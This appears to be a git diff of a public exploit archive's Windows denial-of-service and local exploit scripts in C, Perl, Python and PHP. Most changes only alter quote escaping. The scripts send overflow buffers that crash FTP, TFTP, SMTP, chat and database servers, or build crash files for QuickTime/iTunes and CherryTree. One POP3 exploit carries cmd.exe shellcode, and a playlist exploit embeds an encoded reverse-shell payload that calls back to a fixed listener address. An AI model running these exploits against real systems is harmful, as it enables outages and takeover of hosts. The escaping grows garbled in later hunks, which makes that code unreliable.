\\n\",argv[0]); return 1; } WSACleanup(); WSAStartup(MAKEWORD(2,0),&wsa); - printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]); + printf(\"[+] Connecting to %s:%s ... \",argv[1],argv[2]); if ((he=gethostbyname(argv[1])) == NULL) { - printf("Failed\n[-] Could not init gethostbyname\n"); + printf(\"Failed\\n[-] Could not init gethostbyname\\n\"); return 1; } if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { - printf("Failed\n[-] Socket error\n"); + printf(\"Failed\\n[-] Socket error\\n\"); return 1; } sock_addr.sin_family = PF_INET; sock_addr.sin_port = htons(atoi(argv[2])); sock_addr.sin_addr = *((struct in_addr *)he->h_addr); - memset(&(sock_addr.sin_zero), '\0', 8); + memset(&(sock_addr.sin_zero), \'\\0\', 8); if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) { - printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError()); + printf(\"Failed\\n[-] Sorry, cannot connect to %s:%s. Error: %i\\n\", argv[1],argv[2],WSAGetLastError()); return 1; } - printf("OK\n"); - memset(recvbuff,'\0',1024); + printf(\"OK\\n\"); + memset(recvbuff,\'\\0\',1024); recv(ftpsock, recvbuff, 1024, 0); - printf("[+] Building payload ... "); - memset(evilbuff,'A',buflen); - memset(evilbuff+585,'B',4); //eax and edx will be 42424262 - memcpy(evilbuff,"USER ",5); - memcpy(evilbuff+buflen,"\r\n\0",3); - printf("OK\n[+] Sending USER ... "); + printf(\"[+] Building payload ... \"); + memset(evilbuff,\'A\',buflen); + memset(evilbuff+585,\'B\',4); //eax and edx will be 42424262 + memcpy(evilbuff,\"USER \",5); + memcpy(evilbuff+buflen,\"\\r\\n\\0\",3); + printf(\"OK\\n[+] Sending USER ... \"); if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) { - printf("Failed\n[-] Could not send\n"); + printf(\"Failed\\n[-] Could not send\\n\"); return 1; } - printf("OK\n"); - memset(recvbuff,'\0',1024); + printf(\"OK\\n\"); + memset(recvbuff,\'\\0\',1024); recv(ftpsock, recvbuff, 1024, 0); - memcpy(evilbuff,"PASS ",5); - printf("[+] Sending PASS ... "); + memcpy(evilbuff,\"PASS \",5); + printf(\"[+] Sending PASS ... \"); if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) { - printf("Failed\n[-] Could not send\n"); + printf(\"Failed\\n[-] Could not send\\n\"); return 1; } - printf("OK\n"); + printf(\"OK\\n\"); recv(ftpsock, recvbuff, 1024, 0); - printf("[+] Host should be down\n"); + printf(\"[+] Host should be down\\n\"); return 0; } diff --git a/platforms/windows/dos/3432.pl b/platforms/windows/dos/3432.pl index d954d8789..1ff82ea78 100755 --- a/platforms/windows/dos/3432.pl +++ b/platforms/windows/dos/3432.pl @@ -20,16 +20,16 @@ use IO::Socket; use strict; -my($socket) = ""; +my($socket) = \"\"; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], -PeerPort => "69", +PeerPort => \"69\", -Proto => "UDP")) +Proto => \"UDP\")) { - print $socket "A" x 517; + print $socket \"A\" x 517; sleep(1); @@ -37,7 +37,7 @@ Proto => "UDP")) } else { - print "Cannot connect to $ARGV[0]:69\n"; + print \"Cannot connect to $ARGV[0]:69\\n\"; } # milw0rm.com [2007-03-08] diff --git a/platforms/windows/dos/3866.html b/platforms/windows/dos/3866.html index f7eddca93..8355ebc4d 100755 --- a/platforms/windows/dos/3866.html +++ b/platforms/windows/dos/3866.html @@ -1,7 +1,7 @@ -

2007/05/07

 +

2007/05/07

 
--------------------------------------------------------------------------------------
- Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow
+-------------------------------------------------------------------------------------
+ Versalsoft HTTP File Uploader (UFileUploaderD.dll) \'AddFile\' method Buffer Overflow
  url: http://en.versalsoft.com/
  price: from $59.95 to $799.95
 
@@ -13,25 +13,25 @@
  Try only 1500 characters (or less) to see IE crash.
 -------------------------------------------------------------------------------------
 
-
+
 
- 
+ 
 
-As you can see by the faultmon dump, EIP is overwrite so code execution should
+As you can see by the faultmon dump, EIP is overwrite so code execution should
 be possible... but I leave to posterity the hardest part of work :)
 
 11:40:51.172  pid=08E4 tid=0AB0  EXCEPTION (first-chance)
diff --git a/platforms/windows/dos/40635.py b/platforms/windows/dos/40635.py
new file mode 100755
index 000000000..c82c660b1
--- /dev/null
+++ b/platforms/windows/dos/40635.py
@@ -0,0 +1,45 @@
+#!/usr/bin/python
+# Exploit Title: Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC
+# Date: 27/10/1016
+# Exploit Author: Peter Baris
+# Software Link: https://sourceforge.net/projects/usqlite/?source=directory
+# Version: 1.0.0
+# Tested on: windows 7 and XP SP3
+
+# Longer strings will cause heap based overflow
+
+# usage:  python usqlite.py 
+
+# Output in the debugger
+
+# EAX 0000038C
+# ECX 00B0DA10
+# EDX 0000038C
+# EBX 41414141
+# ESP 0028F8D0 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
+# EBP 41414141
+# ESI 41414141
+# EDI 41414141
+
+# EIP 42424242  <-- EIP is under control, but depending on the OS version, you might have issues finding a jump spot without DEP and ASLR.
+
+###############################################################################################################################################
+
+import socket
+import sys
+
+
+if len(sys.argv)<=1:
+	print("Usage: python usqlite.py hostname")
+	sys.exit()
+
+
+hostname=sys.argv[1]
+port = 3002
+buffer = "A"*259+"B"*4+"C"*360
+
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=sock.connect((hostname,port))
+sock.send(buffer +'\r\n')
+sock.recv(1024)
+sock.close()
diff --git a/platforms/windows/dos/40638.py b/platforms/windows/dos/40638.py
new file mode 100755
index 000000000..0bbd4a156
--- /dev/null
+++ b/platforms/windows/dos/40638.py
@@ -0,0 +1,43 @@
+#!/usr/bin/python
+
+### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ### 
+
+# Date: 2016-10-27
+# PoC Author: n30m1nd
+# Vendor Homepage: http://www.giuspen.com/cherrytree/
+# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
+# Version: Affects all versions of CherryTree prior to 0.37.6
+# Tested on: Win7 64bit and Win10 64 bit
+
+# Credits
+# =======
+# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
+# Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
+
+# How to
+# ======
+# * Run this python script. It will generate a "PoC-1.ctd" file.
+# * Open the file and hover over the link.
+# Bonus
+# =====
+# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
+
+# Why?
+# ====
+# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
+# trying to draw the contents of the graphical bitmaps.
+
+# Exploit code
+# ============
+
+crashfile = '''
+
+    
+        MOUSE OVER THIS
+    
+
+'''
+
+with open("PoC-1.ctd", 'w') as f:
+    f.write(crashfile)
+    f.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/40639.py b/platforms/windows/dos/40639.py
new file mode 100755
index 000000000..9c90c93db
--- /dev/null
+++ b/platforms/windows/dos/40639.py
@@ -0,0 +1,48 @@
+#!/usr/bin/python
+
+### Baby FTP 1.24 - Denial of Service by n30m1nd ### 
+
+# Date: 2016-10-27
+# PoC Author: n30m1nd
+# Vendor Homepage: http://www.pablosoftwaresolutions.com/
+# Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
+# Version: 1.24
+# Tested on: Win7 64bit and Win10 64 bit
+
+# Credits
+# =======
+# Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
+
+# How to
+# ======
+# * Run this python script and write the IP to attack.
+
+# Why?
+# ====
+# The FTP Server can't handle more than ~1505 connections at the same time
+
+# Exploit code
+# ============
+
+import socket
+
+ip = raw_input("[+] IP to attack: ")
+
+sarr = []
+i = 0
+while True:
+	try:
+		sarr.append(socket.create_connection((ip,21)))
+		print "[+] Connection %d" % i
+		crash1 = "A"*500
+
+		sarr[i].send("USER anonymous\r\n" )
+		sarr[i].recv(4096)
+
+		sarr[i].send("PASS n30m1nd\r\n" )
+		sarr[i].recv(4096)
+		i+=1
+	except socket.error:
+		print "[*] Server crashed!!"
+        raw_input()
+		break
\ No newline at end of file
diff --git a/platforms/windows/dos/4289.php b/platforms/windows/dos/4289.php
index 68aa5c234..365fa1c9e 100755
--- a/platforms/windows/dos/4289.php
+++ b/platforms/windows/dos/4289.php
@@ -24,18 +24,18 @@ length for Name & Password. If attacker inserts a long Name &
 Password by editing or make his own login page, chat server
 will crash.
 */
-echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
-if($argc<2)die("\nUsage:   php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
+echo \"Easy Chat Server Remote DoS Exploit\\n\\t\\t\\t\\tby NetJackal\";
+if($argc<2)die(\"\\nUsage:   php dos.php [TARGET] [PORT]\\nExample: php dos.php localhost 80\\n\");
 $host=$argv[1];
 $port=$argv[2];
-$A=str_repeat('A',999);
-echo "\nConnecting...";
+$A=str_repeat(\'A\',999);
+echo \"\\nConnecting...\";
 $link=fsockopen($host,$port,$en,$es,30);
-if(!$link)die("\n$en: $es");
-echo "\nConnected!";
-echo "\nSending exploit...";
-fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
-echo "\nWell done!\n";
+if(!$link)die(\"\\n$en: $es\");
+echo \"\\nConnected!\";
+echo \"\\nSending exploit...\";
+fputs($link,\"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\\r\\nHost: $host\\r\\n\\r\\n\");
+echo \"\\nWell done!\\n\";
 ?>
 
 # milw0rm.com [2007-08-14]
diff --git a/platforms/windows/dos/4294.pl b/platforms/windows/dos/4294.pl
index 4c6ac80b0..0c63bc28a 100755
--- a/platforms/windows/dos/4294.pl
+++ b/platforms/windows/dos/4294.pl
@@ -14,14 +14,14 @@
 use IO::Socket;
 use MIME::Base64;
 $|=1;
-$host = "localhost";
-$a = "QUFB" x 10000;
-my $sock = IO::Socket::INET->new(PeerAddr => "$host",
-PeerPort => '25',
-Proto => 'tcp');
-print $sock "EHLO you\r\n";
-print $sock "AUTH CRAM-MD5\r\n";
-print $sock $a . "\r\n";
+$host = \"localhost\";
+$a = \"QUFB\" x 10000;
+my $sock = IO::Socket::INET->new(PeerAddr => \"$host\",
+PeerPort => \'25\',
+Proto => \'tcp\');
+print $sock \"EHLO you\\r\\n\";
+print $sock \"AUTH CRAM-MD5\\r\\n\";
+print $sock $a . \"\\r\\n\";
 while(<$sock>) {
 print;
 }
diff --git a/platforms/windows/dos/7296.txt b/platforms/windows/dos/7296.txt
index 7c5f778a8..c1c1d6771 100755
--- a/platforms/windows/dos/7296.txt
+++ b/platforms/windows/dos/7296.txt
@@ -28,9 +28,9 @@ Tested agains: Itunes 8.0.2.20/Quicktime 7.5.5 on XP SP3 fully patched
 
 ================
 
-"Many of today's leading authoring, multimedia and entertainment applications rely on QuickTime to do the heavy lifting.
+\"Many of today\'s leading authoring, multimedia and entertainment applications rely on QuickTime to do the heavy lifting.
 QuickTime contains a rich set of developer APIs for handling almost any audio, video and media task.
-Easily make your application multimedia-enabled with QuickTime."
+Easily make your application multimedia-enabled with QuickTime.\"
 
 =======
 
@@ -41,13 +41,13 @@ Quicktime & itunes fails to handle long arguments on a .mov file.
 Quicktime is compiled with the /GS cookie on , so the bug get handled with an exit code :
 c0000409
 but ...
-Itunes doesn't seems to be compiled with the /GS flag, so we get some code execution possible via Itunes.
-The PoC give's us full control over EAX & EDI
+Itunes doesn\'t seems to be compiled with the /GS flag, so we get some code execution possible via Itunes.
+The PoC give\'s us full control over EAX & EDI
 Itunes call unsafely the Quicktime function to play the .mov, so we can trigger a possible code execution
 via this unsafe call to quicktime héhéhé :)
 The only problem, is the lengh of the buffer overflowed :(
 erf ... 49 bytes, less the 8 bytes controlling the EDI & EAX registers so 41.
-i've tryed to find a way to fill some buffer in the .mov to get some code exec working on this poc,
+i\'ve tryed to find a way to fill some buffer in the .mov to get some code exec working on this poc,
 but out of luck, i guess someone will maybe be able to do some magic tricks :)
 
 
@@ -62,19 +62,19 @@ but out of luck, i guess someone will maybe be able to do some magic tricks :)
 use strict;
 
 my $movfile =
-"\x00\x00\x00\x7d\x6d\x6f\x6f\x76\x00\x00\x00\x75\x72\x6d\x72\x61\x00\x00\x00\x6d".
-"\x72\x6d\x64\x61\x00\x00\x00\x55\x72\x64\x72\x66\x00\x00\x00\x00\x75\x72\x6c\x20".
-"\x00\x00\x00\x41\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31".
-"\x2f\x74\x65\x73\x74\x2e\x6d\x6f\x76\x00\x00\x00\x00\x10\x72\x6d\x64\x72\x00\x00".
-"\x00\x00\x00\x00\x05\x78".
-"\x41\x42\x43\x44". #EDI here
-"\x61\x62\x63\x64". #EAX here
-"\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x44\x44\x44\x44\x41\x41\x43\x43".
-"\x43\x41\x41\x41\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
+\"\\x00\\x00\\x00\\x7d\\x6d\\x6f\\x6f\\x76\\x00\\x00\\x00\\x75\\x72\\x6d\\x72\\x61\\x00\\x00\\x00\\x6d\".
+\"\\x72\\x6d\\x64\\x61\\x00\\x00\\x00\\x55\\x72\\x64\\x72\\x66\\x00\\x00\\x00\\x00\\x75\\x72\\x6c\\x20\".
+\"\\x00\\x00\\x00\\x41\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x32\\x37\\x2e\\x30\\x2e\\x30\\x2e\\x31\".
+\"\\x2f\\x74\\x65\\x73\\x74\\x2e\\x6d\\x6f\\x76\\x00\\x00\\x00\\x00\\x10\\x72\\x6d\\x64\\x72\\x00\\x00\".
+\"\\x00\\x00\\x00\\x00\\x05\\x78\".
+\"\\x41\\x42\\x43\\x44\". #EDI here
+\"\\x61\\x62\\x63\\x64\". #EAX here
+\"\\x41\\x41\\x41\\x41\\x41\\x41\".
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x44\\x44\\x44\\x44\\x41\\x41\\x43\\x43\".
+\"\\x43\\x41\\x41\\x41\\x42\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";
 
 
-open(out, "> test.mov");
+open(out, \"> test.mov\");
 binmode(out);
 print (out $movfile);
 close(out);
diff --git a/platforms/windows/dos/843.c b/platforms/windows/dos/843.c
index ec414a1e6..355f77b14 100755
--- a/platforms/windows/dos/843.c
+++ b/platforms/windows/dos/843.c
@@ -11,7 +11,7 @@
 
 -=[+] Application:    Knet
 -=[+] Version:        1.04c
--=[+] Vendor's URL:   www.stormystudios.com
+-=[+] Vendor\'s URL:   www.stormystudios.com
 -=[+] Platform:       Windows
 -=[+] Bug type:       Buffer overflow
 -=[+] Exploitation:   Remote
@@ -68,27 +68,27 @@ if(argc < 3 ) {
  help(argv[0]);
  exit(0);
 }
-printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
+printf(\"\\n\\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\\n\");
    he = gethostbyname(argv[1]);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
 request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
-   memset(&(trg.sin_zero), '\0', 8);
-printf("\n\nConnecting to target \t...");
+   memset(&(trg.sin_zero), \'\\0\', 8);
+printf(\"\\n\\nConnecting to target \\t...\");
 rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
 if(rc==0)
 {
- printf("[Done]\nBuilding evil buffer\t...");
+ printf(\"[Done]\\nBuilding evil buffer\\t...\");
  memset(evilbuf,90,1023);
- printf("[Done]\nSending evil request   \t...");
- sprintf(request,"GET %s \n\r\n\r",evilbuf);
+ printf(\"[Done]\\nSending evil request   \\t...\");
+ sprintf(request,\"GET %s \\n\\r\\n\\r\",evilbuf);
  send(sockfd,request,strlen(request),0);
- printf("[Done]\n\n[Finished] Check the server now\n");
+ printf(\"[Done]\\n\\n[Finished] Check the server now\\n\");
 }
 else
- printf("[Fail] -> Unable to connect\n\n");
+ printf(\"[Fail] -> Unable to connect\\n\\n\");
 close(sockfd);
 return 0;
 
@@ -96,10 +96,10 @@ return 0;
 
 void help(char *program_name) {
 
-printf("\n\t-=[      KNet <= 1.04b PoC Denial Of Service      ]=-\n");
-printf("\t-=[                                                    ]=-\n");
-printf("\t-=[      Coded by ders -/www.x0n3-h4ck.org\\-      ]=-\n\n");
-printf("Usage: %s  \n",program_name);
+printf(\"\\n\\t-=[      KNet <= 1.04b PoC Denial Of Service      ]=-\\n\");
+printf(\"\\t-=[                                                    ]=-\\n\");
+printf(\"\\t-=[      Coded by ders -/www.x0n3-h4ck.org\\\\-      ]=-\\n\\n\");
+printf(\"Usage: %s  \\n\",program_name);
 }
 
 // milw0rm.com [2005-02-25]
\ No newline at end of file
diff --git a/platforms/windows/dos/9881.txt b/platforms/windows/dos/9881.txt
index e82c9dfe7..50f19fbe2 100755
--- a/platforms/windows/dos/9881.txt
+++ b/platforms/windows/dos/9881.txt
@@ -8,7 +8,7 @@ Exploitation: remote BoF
 
 Date:         2009-10-06
 
-Author:       Francis Provencher (Protek Research Lab's) 
+Author:       Francis Provencher (Protek Research Lab\'s) 
 
 Special Thanks to:  M Jeremy Brown 	
              
@@ -65,25 +65,25 @@ $port = 110;
 
 # Simple cmd.exe
 
-$sc2 =  "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" .
-        "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" .
-        "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" .
-        "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" .
-        "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
+$sc2 =  \"\\xB8\\xFF\\xEF\\xFF\\xFF\\xF7\\xD0\\x2B\\xE0\\x55\\x8B\\xEC\" .
+        \"\\x33\\xFF\\x57\\x83\\xEC\\x04\\xC6\\x45\\xF8\\x63\\xC6\\x45\" .
+        \"\\xF9\\x6D\\xC6\\x45\\xFA\\x64\\xC6\\x45\\xFB\\x2E\\xC6\\x45\" .
+        \"\\xFC\\x65\\xC6\\x45\\xFD\\x78\\xC6\\x45\\xFE\\x65\\x8D\\x45\" .
+        \"\\xF8\\x50\\xBB\\xC7\\x93\\xBF\\x77\\xFF\\xD3\";
 
 
-$serv = IO::Socket::INET->new(Proto=>'tcp',
+$serv = IO::Socket::INET->new(Proto=>\'tcp\',
                               LocalPort=>$port,
                               Listen=>1)
-or die "Error: listen($port)\n";
+or die \"Error: listen($port)\\n\";
 
-$cli = $serv->accept() or die "Error: accept()\n";
+$cli = $serv->accept() or die \"Error: accept()\\n\";
 
-$retaddr = pack('l', $ret);
-$junk    = "A" x 709;
+$retaddr = pack(\'l\', $ret);
+$junk    = \"A\" x 709;
 
 
-$payload = "-ERR " . $junk . $retaddr  . "\x90" x 1 . $sc2 .  "\r\n"; # 714 to overwrite EIP
+$payload = \"-ERR \" . $junk . $retaddr  . \"\\x90\" x 1 . $sc2 .  \"\\r\\n\"; # 714 to overwrite EIP
 
      $cli->send($payload);
 
diff --git a/platforms/windows/local/10747.py b/platforms/windows/local/10747.py
index 2c0a00652..59c004dbf 100755
--- a/platforms/windows/local/10747.py
+++ b/platforms/windows/local/10747.py
@@ -11,63 +11,63 @@
 # Downloadable from: http://mini-stream.net/
 # Tested against WinXP SP2 and SP3 - English
 
-outputfile="astley.pls"
+outputfile=\\\\\\\"astley.pls\\\\\\\"
 
 
-shellcode="\x44"*17403
-#shellcode+="\xed\x1e\x94\x7c" # JMP ESP - SHELL32.dll Win XP SP2
-shellcode+="\x53\x93\x42\x7e" # JMP ESP - USER32.dll Win XP SP3
-shellcode+="CAFE"*8 # 32 Byte NOP Sled
+shellcode=\\\\\\\"\\\\\\\\x44\\\\\\\"*17403
+#shellcode+=\\\\\\\"\\\\\\\\xed\\\\\\\\x1e\\\\\\\\x94\\\\\\\\x7c\\\\\\\" # JMP ESP - SHELL32.dll Win XP SP2
+shellcode+=\\\\\\\"\\\\\\\\x53\\\\\\\\x93\\\\\\\\x42\\\\\\\\x7e\\\\\\\" # JMP ESP - USER32.dll Win XP SP3
+shellcode+=\\\\\\\"CAFE\\\\\\\"*8 # 32 Byte NOP Sled
 # msfpayload windows/shell_reverse_tcp LHOST=172.16.77.218 LPORT=443 R | msfencode -e x86/alpha_upper -t c
-shellcode+=("\x89\xe5\xda\xd6\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
-"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
-"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
-"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
-"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4d\x59\x45\x50"
-"\x43\x30\x45\x50\x43\x50\x4d\x59\x4a\x45\x46\x51\x48\x52\x42"
-"\x44\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x50\x52\x44\x4c\x4c\x4b"
-"\x50\x52\x45\x44\x4c\x4b\x43\x42\x51\x38\x44\x4f\x48\x37\x51"
-"\x5a\x51\x36\x46\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
-"\x43\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x4f\x31\x48\x4f\x44"
-"\x4d\x43\x31\x4f\x37\x4d\x32\x4a\x50\x46\x32\x46\x37\x4c\x4b"
-"\x51\x42\x42\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c"
-"\x4b\x47\x30\x42\x58\x4d\x55\x49\x50\x44\x34\x50\x4a\x45\x51"
-"\x4e\x30\x46\x30\x4c\x4b\x50\x48\x45\x48\x4c\x4b\x50\x58\x47"
-"\x50\x45\x51\x48\x53\x4a\x43\x47\x4c\x47\x39\x4c\x4b\x47\x44"
-"\x4c\x4b\x43\x31\x4e\x36\x46\x51\x4b\x4f\x50\x31\x4f\x30\x4e"
-"\x4c\x4f\x31\x48\x4f\x44\x4d\x45\x51\x4f\x37\x46\x58\x4d\x30"
-"\x44\x35\x4b\x44\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46"
-"\x44\x42\x55\x4b\x52\x50\x58\x4c\x4b\x51\x48\x47\x54\x43\x31"
-"\x49\x43\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45"
-"\x4c\x43\x31\x49\x43\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
-"\x4c\x49\x50\x44\x46\x44\x46\x44\x51\x4b\x51\x4b\x45\x31\x46"
-"\x39\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a"
-"\x4c\x4b\x44\x52\x4a\x4b\x4c\x46\x51\x4d\x45\x38\x50\x33\x50"
-"\x32\x45\x50\x43\x30\x42\x48\x43\x47\x43\x43\x50\x32\x51\x4f"
-"\x51\x44\x42\x48\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x48"
-"\x55\x4e\x58\x4a\x30\x45\x51\x45\x50\x45\x50\x47\x59\x48\x44"
-"\x46\x34\x46\x30\x43\x58\x47\x59\x4b\x30\x42\x4b\x45\x50\x4b"
-"\x4f\x49\x45\x46\x30\x50\x50\x46\x30\x50\x50\x47\x30\x46\x30"
-"\x47\x30\x50\x50\x45\x38\x4a\x4a\x44\x4f\x49\x4f\x4b\x50\x4b"
-"\x4f\x48\x55\x4c\x49\x49\x57\x42\x48\x4e\x4c\x42\x30\x50\x4d"
-"\x48\x5a\x42\x48\x45\x52\x45\x50\x45\x51\x4f\x4b\x4c\x49\x4d"
-"\x36\x42\x4a\x44\x50\x50\x56\x51\x47\x43\x58\x4c\x59\x49\x35"
-"\x42\x54\x45\x31\x4b\x4f\x4e\x35\x43\x58\x42\x43\x42\x4d\x42"
-"\x44\x45\x50\x4c\x49\x4b\x53\x51\x47\x46\x37\x50\x57\x46\x51"
-"\x4b\x46\x43\x5a\x44\x52\x50\x59\x50\x56\x4a\x42\x4b\x4d\x42"
-"\x46\x4f\x37\x47\x34\x46\x44\x47\x4c\x45\x51\x43\x31\x4c\x4d"
-"\x47\x34\x51\x34\x42\x30\x48\x46\x45\x50\x50\x44\x51\x44\x50"
-"\x50\x46\x36\x50\x56\x46\x36\x47\x36\x51\x46\x50\x4e\x50\x56"
-"\x46\x36\x46\x33\x51\x46\x42\x48\x43\x49\x48\x4c\x47\x4f\x4d"
-"\x56\x4b\x4f\x48\x55\x4c\x49\x4d\x30\x50\x4e\x51\x46\x47\x36"
-"\x4b\x4f\x50\x30\x43\x58\x45\x58\x4b\x37\x45\x4d\x45\x30\x4b"
-"\x4f\x49\x45\x4f\x4b\x4c\x30\x4f\x45\x4f\x52\x50\x56\x42\x48"
-"\x49\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x43"
-"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x43\x45\x45\x55"
-"\x4f\x4b\x50\x47\x44\x53\x44\x32\x42\x4f\x42\x4a\x45\x50\x46"
-"\x33\x4b\x4f\x4e\x35\x44\x4a\x41\x41")
+shellcode+=(\\\\\\\"\\\\\\\\x89\\\\\\\\xe5\\\\\\\\xda\\\\\\\\xd6\\\\\\\\xd9\\\\\\\\x75\\\\\\\\xf4\\\\\\\\x58\\\\\\\\x50\\\\\\\\x59\\\\\\\\x49\\\\\\\\x49\\\\\\\\x49\\\\\\\\x49\\\\\\\\x43\\\\\\\"
+\\\\\\\"\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x51\\\\\\\\x5a\\\\\\\\x56\\\\\\\\x54\\\\\\\\x58\\\\\\\\x33\\\\\\\\x30\\\\\\\\x56\\\\\\\\x58\\\\\\\\x34\\\\\\\"
+\\\\\\\"\\\\\\\\x41\\\\\\\\x50\\\\\\\\x30\\\\\\\\x41\\\\\\\\x33\\\\\\\\x48\\\\\\\\x48\\\\\\\\x30\\\\\\\\x41\\\\\\\\x30\\\\\\\\x30\\\\\\\\x41\\\\\\\\x42\\\\\\\\x41\\\\\\\\x41\\\\\\\"
+\\\\\\\"\\\\\\\\x42\\\\\\\\x54\\\\\\\\x41\\\\\\\\x41\\\\\\\\x51\\\\\\\\x32\\\\\\\\x41\\\\\\\\x42\\\\\\\\x32\\\\\\\\x42\\\\\\\\x42\\\\\\\\x30\\\\\\\\x42\\\\\\\\x42\\\\\\\\x58\\\\\\\"
+\\\\\\\"\\\\\\\\x50\\\\\\\\x38\\\\\\\\x41\\\\\\\\x43\\\\\\\\x4a\\\\\\\\x4a\\\\\\\\x49\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x4d\\\\\\\\x38\\\\\\\\x4d\\\\\\\\x59\\\\\\\\x45\\\\\\\\x50\\\\\\\"
+\\\\\\\"\\\\\\\\x43\\\\\\\\x30\\\\\\\\x45\\\\\\\\x50\\\\\\\\x43\\\\\\\\x50\\\\\\\\x4d\\\\\\\\x59\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x46\\\\\\\\x51\\\\\\\\x48\\\\\\\\x52\\\\\\\\x42\\\\\\\"
+\\\\\\\"\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x52\\\\\\\\x50\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x52\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4c\\\\\\\\x4b\\\\\\\"
+\\\\\\\"\\\\\\\\x50\\\\\\\\x52\\\\\\\\x45\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x42\\\\\\\\x51\\\\\\\\x38\\\\\\\\x44\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x37\\\\\\\\x51\\\\\\\"
+\\\\\\\"\\\\\\\\x5a\\\\\\\\x51\\\\\\\\x36\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x30\\\\\\\\x4e\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x4c\\\\\\\"
+\\\\\\\"\\\\\\\\x43\\\\\\\\x51\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x44\\\\\\\\x42\\\\\\\\x46\\\\\\\\x4c\\\\\\\\x51\\\\\\\\x30\\\\\\\\x4f\\\\\\\\x31\\\\\\\\x48\\\\\\\\x4f\\\\\\\\x44\\\\\\\"
